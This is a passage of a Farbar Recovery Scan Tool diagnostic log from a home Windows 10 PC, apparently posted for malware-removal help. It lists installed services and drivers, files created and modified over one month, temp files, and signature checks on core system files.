R2 igfxCUIService2.0.0.0; C:\Windows\system32\igfxCUIService.exe [351120 2015-07-18] (Intel Corporation)
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [File not signed]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
S3 PAExec; C:\Windows\PAExec.exe [190464 2014-10-18] (Power Admin LLC) [File not signed]
R2 PDFProFiltSrvPP; C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe [145256 2011-08-02] (Nuance Communications, Inc.)
R2 Razer Chroma SDK Service; C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKService.exe [54272 2015-12-18] (Razer Inc.) [File not signed]
R2 Razer Game Scanner Service; C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [188072 2015-11-05] ()
R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1750712 2015-06-16] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2102496 2015-06-16] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [224712 2015-07-24] (Safer-Networking Ltd.)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation)
S2 Hamachi2Svc; D:\LogMeIn\hamachi-2.exe -s [X]
S2 jhi_service; "C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe" [X]
S2 LMS; "C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe" [X]

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S0 amdkmafd; C:\Windows\System32\drivers\amdkmafd.sys [40720 2015-07-29] (Advanced Micro Devices, Inc.)
R1 AppleCharger; C:\Windows\System32\DRIVERS\AppleCharger.sys [22240 2013-10-28] ()
R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [29168 2015-07-02] ()
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [89944 2015-07-02] (Avast Software s.r.o.)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [93528 2015-07-02] (Avast Software s.r.o.)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [65736 2015-07-02] ()
S1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1047320 2015-07-02] (Avast Software s.r.o.)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [442264 2015-07-02] (Avast Software s.r.o.)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [137288 2015-07-02] (Avast Software s.r.o.)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [272248 2015-07-02] ()
R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdWT6.sys [102912 2015-09-18] (Advanced Micro Devices)
S3 Hamachi; C:\Windows\system32\DRIVERS\Hamdrv.sys [45680 2015-11-12] (LogMeIn Inc.)
S3 LADF_DHP2; C:\Windows\system32\DRIVERS\ladfDHP2amd64.sys [62168 2010-09-29] (Logitech)
S3 LADF_SBVM; C:\Windows\system32\DRIVERS\ladfSBVMamd64.sys [377176 2010-09-29] (Logitech)
R2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-22] (Logitech)
R3 LGJoyXlCore; C:\Windows\system32\drivers\LGJoyXlCore.sys [68384 2015-06-11] (Logitech Inc.)
R3 MEIx64; C:\Windows\system32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation)
R0 PxHlpa64; C:\Windows\System32\Drivers\PxHlpa64.sys [56336 2012-08-10] (Corel Corporation)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [895256 2015-06-23] (Realtek )
S3 rzdaendpt; C:\Windows\System32\drivers\rzdaendpt.sys [43720 2015-08-14] (Razer Inc)
S3 rzendpt; C:\Windows\System32\drivers\rzendpt.sys [50392 2015-08-14] (Razer Inc)
R3 rzmpos; C:\Windows\System32\drivers\rzmpos.sys [48840 2015-08-14] (Razer Inc)
R2 rzpmgrk; C:\WINDOWS\system32\drivers\rzpmgrk.sys [37184 2015-09-23] (Razer, Inc.)
R2 rzpnk; C:\WINDOWS\system32\drivers\rzpnk.sys [130880 2015-12-15] (Razer, Inc.)
S3 rzvkeyboard; C:\Windows\System32\drivers\rzvkeyboard.sys [44232 2015-08-14] (Razer Inc)
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-10] ()
R2 VBoxAswDrv; C:\Program Files\AVAST Software\Avast\ng\vbox\VBoxAswDrv.sys [273824 2015-07-02] (Avast Software)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Corporation)
R3 XtuAcpiDriver; C:\Windows\System32\drivers\XtuAcpiDriver.sys [63840 2015-06-06] (Intel Corporation)
U3 idsvc; no ImagePath
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
U3 wpcsvc; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-02-29 20:46 - 2016-02-29 20:46 - 00028580 _____ C:\Users\Kym\Desktop\FRST.txt
2016-02-29 20:43 - 2016-02-29 20:46 - 00000000 ____D C:\FRST
2016-02-29 20:39 - 2016-02-29 20:39 - 00002342 _____ C:\Users\Public\Desktop\Tweaking.com - Registry Backup.lnk
2016-02-29 20:39 - 2016-02-29 20:39 - 00000207 _____ C:\WINDOWS\tweaking.com-regbackup-KYM-PC-Windows-10-Home-(64-bit).dat
2016-02-29 20:39 - 2016-02-29 20:39 - 00000000 ____D C:\RegBackup
2016-02-29 20:39 - 2016-02-29 20:39 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2016-02-29 20:39 - 2016-02-29 20:39 - 00000000 ____D C:\Program Files (x86)\Tweaking.com
2016-02-29 20:38 - 2016-02-29 20:40 - 05198336 _____ (AVAST Software) C:\Users\Kym\Desktop\aswMBR.exe
2016-02-29 20:38 - 2016-02-29 20:39 - 00016377 _____ C:\WINDOWS\Tweaking.com - Registry Backup Setup Log.txt
2016-02-29 20:36 - 2016-02-29 20:43 - 02371072 _____ (Farbar) C:\Users\Kym\Desktop\FRST64.exe
2016-02-29 20:35 - 2016-02-29 20:38 - 04777232 _____ (Tweaking.com) C:\Users\Kym\Downloads\tweaking.com_registry_backup_setup.exe
2016-02-29 20:32 - 2016-02-29 20:32 - 00016148 _____ C:\WINDOWS\system32\KYM-PC_Kym_HistoryPrediction.bin
2016-02-29 19:37 - 2016-02-29 20:31 - 00000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
2016-02-29 19:34 - 2016-02-29 19:34 - 00000000 ____D C:\WINDOWS\pss
2016-02-28 21:02 - 2016-01-08 22:44 - 00000822 _____ C:\WINDOWS\system32\Drivers\etc\hosts.20160228-210203.backup
2016-02-28 18:59 - 2016-02-28 18:59 - 00000000 ____D C:\Program Files\Common Files\AV
2016-02-28 18:50 - 2016-02-28 21:01 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
2016-02-28 18:50 - 2016-02-28 20:23 - 00001494 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2016-02-28 18:50 - 2016-02-28 20:23 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2016-02-28 18:50 - 2016-02-28 20:23 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2016-02-28 18:50 - 2016-02-28 18:50 - 00000000 ____D C:\WINDOWS\System32\Tasks\Safer-Networking
2016-02-28 18:50 - 2015-06-16 17:32 - 00020760 _____ (Safer-Networking Ltd.) C:\WINDOWS\system32\sdnclean64.exe
2016-02-28 18:04 - 2016-02-28 18:48 - 46525608 _____ (Safer-Networking Ltd. ) C:\Users\Kym\Downloads\spybot-2.4.exe
2016-02-26 06:50 - 2016-02-26 06:50 - 00002378 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-02-26 00:30 - 2016-02-26 06:49 - 00000000 ____D C:\Users\Kym\AppData\Local\Deployment
2016-02-26 00:30 - 2016-02-26 00:30 - 00000000 ____D C:\Users\Kym\AppData\Local\Apps\2.0
2016-02-25 23:16 - 2016-02-25 23:16 - 00000000 ____D C:\Users\Kym\AppData\Roaming\Sun
2016-02-25 23:16 - 2016-02-25 23:16 - 00000000 ____D C:\Users\Kym\AppData\LocalLow\Oracle
2016-02-25 23:16 - 2016-02-25 23:16 - 00000000 ____D C:\Users\Kym\.oracle_jre_usage
2016-02-21 16:39 - 2016-02-21 16:39 - 00000000 ____D C:\ProgramData\0342bcb1-0de3-0
2016-02-21 16:34 - 2016-02-21 16:34 - 00003878 _____ C:\WINDOWS\System32\Tasks\{9DCFB73E-9A6F-ACFC-B0BC-4203F9A4BD3D}
2016-02-21 16:34 - 2016-02-21 16:34 - 00000000 ____D C:\ProgramData\3c355888
2016-02-21 16:34 - 2016-02-21 16:34 - 00000000 ____D C:\ProgramData\0342bcb1-60e1-0
2016-02-21 16:33 - 2016-02-21 16:33 - 00000000 ____D C:\ProgramData\{21b5474a-312c-0}
2016-02-21 16:33 - 2016-02-21 16:33 - 00000000 ____D C:\ProgramData\{0b5d3910-112c-1}
2016-02-18 15:04 - 2016-02-18 17:51 - 00000000 ____D C:\Users\Kym\Documents\Kalyani
2016-02-15 19:06 - 2016-02-15 19:06 - 00223232 _____ C:\Users\Kym\Downloads\Archibald Prize 2015 information.pdf
2016-02-15 13:32 - 2016-02-15 13:32 - 00281328 _____ C:\WINDOWS\Minidump\021516-19125-01.dmp
2016-02-13 19:16 - 2016-02-13 19:19 - 00000000 ____D C:\Users\Kym\AppData\Local\FullTiltPoker
2016-02-13 19:06 - 2016-02-13 19:06 - 00000000 ____D C:\Users\Kym\AppData\Roaming\Party
2016-02-13 19:06 - 2016-02-13 19:06 - 00000000 ____D C:\Users\Kym\AppData\Roaming\cef-cache
2016-02-13 19:00 - 2016-02-13 19:00 - 00000683 _____ C:\Users\Public\Desktop\Full Tilt Poker.lnk
2016-02-13 19:00 - 2016-02-13 19:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Full Tilt Poker
2016-02-13 18:11 - 2016-02-13 19:00 - 00877888 _____ C:\Users\Kym\Downloads\PartyPokerSetup.exe
2016-02-13 18:10 - 2016-02-13 18:59 - 73087280 _____ C:\Users\Kym\Downloads\FullTiltSetup.exe
2016-02-13 18:10 - 2016-02-13 18:10 - 00877888 _____ C:\Users\Kym\Downloads\Unconfirmed 937642.crdownload
2016-02-10 23:28 - 2016-01-31 16:25 - 01951872 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-02-10 23:28 - 2016-01-31 16:23 - 02601160 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2016-02-10 23:28 - 2016-01-31 16:23 - 01420392 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2016-02-10 23:28 - 2016-01-31 16:06 - 01531368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-02-10 23:28 - 2016-01-31 16:04 - 01811360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2016-02-10 23:28 - 2016-01-31 16:04 - 01180696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2016-02-10 23:28 - 2016-01-31 15:38 - 21873152 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-02-10 23:28 - 2016-01-31 15:33 - 24593920 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-02-10 23:28 - 2016-01-31 15:29 - 11557888 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-02-10 23:28 - 2016-01-31 15:26 - 06787072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2016-02-10 23:28 - 2016-01-31 15:26 - 03793408 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2016-02-10 23:28 - 2016-01-31 15:25 - 12504576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-02-10 23:28 - 2016-01-31 15:17 - 00109056 _____ (Microsoft Corporation) C:\WINDOWS\system32\hlink.dll
2016-02-10 23:28 - 2016-01-31 15:16 - 09889280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-02-10 23:28 - 2016-01-31 15:13 - 04791808 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-02-10 23:28 - 2016-01-31 15:11 - 05156352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2016-02-10 23:28 - 2016-01-31 15:04 - 00100352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hlink.dll
2016-02-10 23:28 - 2016-01-31 15:00 - 11263488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-02-10 23:27 - 2016-01-31 16:25 - 01248896 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2016-02-10 23:27 - 2016-01-31 16:24 - 01824880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-02-10 23:27 - 2016-01-31 16:06 - 01535032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2016-02-10 23:27 - 2016-01-31 16:06 - 00809336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2016-02-10 23:27 - 2016-01-31 15:34 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngckeyenum.dll
2016-02-10 23:27 - 2016-01-31 15:33 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\system32\IoTAssignedAccessLockFramework.dll
2016-02-10 23:27 - 2016-01-31 15:29 - 00141312 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasman.dll
2016-02-10 23:27 - 2016-01-31 15:25 - 02237952 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-02-10 23:27 - 2016-01-31 15:25 - 00366592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2016-02-10 23:27 - 2016-01-31 15:25 - 00143872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
2016-02-10 23:27 - 2016-01-31 15:24 - 00784384 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2016-02-10 23:27 - 2016-01-31 15:24 - 00047616 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
2016-02-10 23:27 - 2016-01-31 15:24 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
2016-02-10 23:27 - 2016-01-31 15:23 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2016-02-10 23:27 - 2016-01-31 15:22 - 00680448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2016-02-10 23:27 - 2016-01-31 15:20 - 02849792 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-02-10 23:27 - 2016-01-31 15:19 - 01602560 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-02-10 23:27 - 2016-01-31 15:19 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkDesktopSettings.dll
2016-02-10 23:27 - 2016-01-31 15:19 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\IoTAssignedAccessLockFramework.dll
2016-02-10 23:27 - 2016-01-31 15:18 - 00771072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-02-10 23:27 - 2016-01-31 15:18 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll
2016-02-10 23:27 - 2016-01-31 15:17 - 19324928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-02-10 23:27 - 2016-01-31 15:16 - 00950272 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-02-10 23:27 - 2016-01-31 15:14 - 07525376 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-02-10 23:27 - 2016-01-31 15:14 - 03588096 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-02-10 23:27 - 2016-01-31 15:13 - 00123392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasman.dll
2016-02-10 23:27 - 2016-01-31 15:13 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\ztrace_maps.dll
2016-02-10 23:27 - 2016-01-31 15:11 - 00678400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2016-02-10 23:27 - 2016-01-31 15:11 - 00291840 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
2016-02-10 23:27 - 2016-01-31 15:11 - 00162304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll
2016-02-10 23:27 - 2016-01-31 15:07 - 18802176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-02-10 23:27 - 2016-01-31 15:06 - 02316800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-02-10 23:27 - 2016-01-31 15:05 - 01380864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-02-10 23:27 - 2016-01-31 15:05 - 00574464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2016-02-10 23:27 - 2016-01-31 15:05 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll
2016-02-10 23:27 - 2016-01-31 15:02 - 03580416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-02-10 23:27 - 2016-01-31 15:02 - 00768000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2016-02-10 23:27 - 2016-01-31 14:59 - 05457408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-02-10 23:27 - 2016-01-31 14:58 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ztrace_maps.dll
2016-02-09 22:56 - 2016-02-09 22:56 - 00281328 _____ C:\WINDOWS\Minidump\020916-19296-01.dmp
2016-02-09 03:29 - 2016-02-09 03:29 - 00001277 _____ C:\Users\Kym\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CNext.lnk
2016-02-09 03:28 - 2016-02-09 03:28 - 00004296 _____ C:\WINDOWS\System32\Tasks\AMD Updater
2016-02-09 03:25 - 2016-02-13 19:16 - 00000000 ____D C:\Users\Kym\AppData\Local\AMD
2016-02-09 03:25 - 2016-02-09 03:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Settings
2016-02-09 03:25 - 2016-02-09 03:25 - 00000000 ____D C:\Program Files\Common Files\ATI Technologies
2016-02-09 03:20 - 2016-02-09 03:23 - 322471624 _____ (AMD Inc.) C:\Users\Kym\Downloads\radeon-crimson-15.12-win10-64bit.exe
2016-02-08 02:13 - 2016-02-08 02:13 - 00000202 _____ C:\Users\Kym\Desktop\Tom Clancy's Rainbow Six Siege.url
2016-02-06 01:02 - 2016-02-28 20:24 - 00000000 ____D C:\Users\Kym\AppData\LocalLow\uTorrent
2016-02-03 19:16 - 2016-02-03 19:16 - 06253170 _____ C:\Users\Kym\Downloads\1776 - Donkey Kong Country 2 (U)(Independent).zip
2016-02-03 19:07 - 2016-02-03 19:08 - 11918630 _____ C:\Users\Kym\Downloads\2214 - Donkey Kong Country 3 (E)(Rising Sun).zip
2016-02-03 19:06 - 2016-02-03 19:06 - 02981626 _____ C:\Users\Kym\Downloads\Donkey Kong Country 2 - Diddy's Kong Quest (USA) (En,Fr) (Rev A).zip
2016-02-03 19:04 - 2016-02-03 19:04 - 05642942 _____ C:\Users\Kym\Downloads\1055 - Donkey Kong Country (U)(Evasion).zip
2016-02-02 12:22 - 2016-02-02 12:22 - 00000000 ____D C:\Users\Kym\Documents\MIsc

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-02-29 20:42 - 2014-10-12 20:42 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-02-29 20:37 - 2015-08-09 01:28 - 01011482 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-02-29 20:37 - 2015-07-10 21:02 - 00000000 ____D C:\WINDOWS\INF
2016-02-29 20:35 - 2015-07-10 21:04 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-02-29 20:32 - 2015-08-09 01:48 - 00000000 __SHD C:\Users\Kym\IntelGraphicsProfiles
2016-02-29 20:32 - 2015-08-09 01:27 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2016-02-29 20:32 - 2015-07-10 22:21 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-02-29 20:32 - 2014-09-10 20:01 - 00003804 _____ C:\WINDOWS\System32\Tasks\AutoKMS
2016-02-29 20:32 - 2014-05-02 21:01 - 00000916 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-02-29 20:31 - 2015-07-10 19:05 - 00262144 ___SH C:\WINDOWS\system32\config\BBI
2016-02-29 19:06 - 2014-05-02 21:01 - 00000920 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-02-29 12:23 - 2015-07-10 21:04 - 00000000 ___HD C:\Program Files\WindowsApps
2016-02-28 21:23 - 2014-05-02 22:28 - 00000000 ____D C:\Users\Kym\AppData\Roaming\uTorrent
2016-02-28 18:06 - 2015-12-25 19:32 - 00004144 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{5957CCCD-7167-42EC-BDE9-58F86B871E77}
2016-02-28 17:59 - 2014-05-02 21:43 - 00004280 _____ C:\WINDOWS\System32\Tasks\avast! Emergency Update
2016-02-26 00:31 - 2015-08-09 11:27 - 00000000 ____D C:\Users\Kym\AppData\Local\MicrosoftEdge
2016-02-25 23:54 - 2009-07-14 15:32 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2016-02-25 23:38 - 2015-04-09 16:31 - 00000000 ____D C:\Users\Kym\Documents\Outlook Files
2016-02-25 23:16 - 2015-08-09 01:29 - 00000000 ____D C:\Users\Kym
2016-02-25 23:16 - 2014-10-18 18:59 - 00097888 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2016-02-25 23:16 - 2014-10-18 18:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-02-25 23:16 - 2014-10-18 18:59 - 00000000 ____D C:\Program Files (x86)\Java
2016-02-25 22:43 - 2014-10-18 18:43 - 00000000 ____D C:\AMD
2016-02-21 16:34 - 2015-12-24 16:50 - 00000000 ____D C:\ProgramData\3af26a8e-45f1-1
2016-02-21 16:34 - 2015-12-24 16:50 - 00000000 ____D C:\ProgramData\3af26a8e-3475-0
2016-02-19 20:02 - 2015-03-12 22:56 - 00000000 ____D C:\Users\Kym\AppData\Local\Spotify
2016-02-19 20:01 - 2015-03-12 22:54 - 00000000 ____D C:\Users\Kym\AppData\Roaming\Spotify
2016-02-18 21:54 - 2016-01-16 18:56 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2016-02-18 00:33 - 2015-07-10 21:04 - 00000000 ____D C:\WINDOWS\system32\NDF
2016-02-16 19:47 - 2015-07-10 21:04 - 00000000 ____D C:\WINDOWS\rescache
2016-02-16 19:24 - 2014-05-25 16:10 - 00000000 ____D C:\Users\Kym\AppData\Local\ElevatedDiagnostics
2016-02-15 20:11 - 2015-08-09 01:48 - 00000000 ____D C:\Users\Kym\AppData\Local\Packages
2016-02-15 13:32 - 2015-09-27 23:34 - 00000000 ____D C:\WINDOWS\Minidump
2016-02-13 19:10 - 2014-11-20 11:53 - 00000000 ____D C:\Users\Kym\AppData\Local\PokerStars
2016-02-13 13:57 - 2015-07-10 23:14 - 00000000 ____D C:\Program Files\Windows Journal
2016-02-12 19:44 - 2015-08-08 23:54 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013
2016-02-12 19:42 - 2015-07-10 20:55 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-02-12 19:42 - 2009-07-14 12:34 - 00000478 _____ C:\WINDOWS\win.ini
2016-02-12 19:41 - 2014-05-04 15:26 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-02-12 19:37 - 2014-05-04 15:26 - 146614896 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-02-09 03:30 - 2014-09-29 14:52 - 00000000 ____D C:\Program Files (x86)\Raptr
2016-02-09 03:25 - 2015-08-09 01:27 - 00000000 ____D C:\Program Files\AMD
2016-02-09 03:25 - 2015-02-12 08:41 - 00000000 ____D C:\Program Files (x86)\AMD
2016-02-09 03:19 - 2014-09-22 17:29 - 00000000 ____D C:\ProgramData\AMD
2016-02-08 23:26 - 2015-11-28 22:42 - 00000000 ____D C:\Users\Kym\AppData\Local\Ubisoft Game Launcher
2016-02-08 16:30 - 2014-09-02 15:05 - 00000000 ____D C:\Users\Kym\Documents\My Games
2016-02-08 16:17 - 2015-08-09 01:28 - 00000000 ____D C:\ProgramData\Package Cache
2016-02-03 08:47 - 2015-07-10 21:06 - 00828920 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2016-02-03 08:47 - 2015-07-10 21:06 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2016-02-02 17:01 - 2014-05-02 21:01 - 00003978 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2016-02-02 17:01 - 2014-05-02 21:01 - 00003746 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2016-02-01 22:21 - 2014-10-03 09:28 - 00000000 ____D C:\Users\Kym\Documents\Bond
2016-02-01 21:47 - 2014-05-02 21:02 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive

==================== Files in the root of some directories =======

2015-09-08 19:17 - 2015-09-08 19:17 - 0000000 _____ () C:\Program Files (x86)\ATI Technologies
2015-08-14 11:25 - 2015-08-14 11:25 - 0000000 _____ () C:\Program Files (x86)\Common Files\AMD
2014-07-23 14:06 - 2015-02-19 13:45 - 0000953 _____ () C:\Users\Kym\AppData\Roaming\Network Meter_Settings.ini
2014-07-23 17:57 - 2015-08-09 01:04 - 0000028 _____ () C:\Users\Kym\AppData\Roaming\Network Meter_Usage.ini
2015-05-21 11:30 - 2015-05-21 11:31 - 0001062 _____ () C:\Users\Kym\AppData\Roaming\SpeedRunnersLog.txt
2014-05-02 20:55 - 2014-08-28 11:18 - 0007599 _____ () C:\Users\Kym\AppData\Local\Resmon.ResmonCfg
2015-06-18 16:22 - 2015-06-18 16:27 - 0000260 _____ () C:\ProgramData\csgobm.project
2015-06-18 16:22 - 2015-06-18 16:27 - 0000002 _____ () C:\ProgramData\csgobm2.project
2015-06-18 16:19 - 2015-06-18 16:19 - 0010299 _____ () C:\ProgramData\csgobmbacked.cfg
2015-06-18 16:19 - 2015-06-18 16:19 - 0000077 _____ () C:\ProgramData\csgobmsettings.ini
2015-08-09 01:27 - 2015-08-09 01:27 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

Files to move or delete:
====================
C:\Users\Kym\IP_Log_Data.js
C:\Users\Kym\Network_Meter_Data.js


Some files in TEMP:
====================
C:\Users\Kym\AppData\Local\Temp\ICReinstall_setup.exe
C:\Users\Kym\AppData\Local\Temp\raptrpatch.exe
C:\Users\Kym\AppData\Local\Temp\raptr_stub.exe
C:\Users\Kym\AppData\Local\Temp\readSTILog.dll
C:\Users\Kym\AppData\Local\Temp\SIInvoker.exe
C:\Users\Kym\AppData\Local\Temp\tmp5300.exe
C:\Users\Kym\AppData\Local\Temp\tmp93FD.exe
C:\Users\Kym\AppData\Local\Temp\vlc-2.2.1-win32.exe


==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
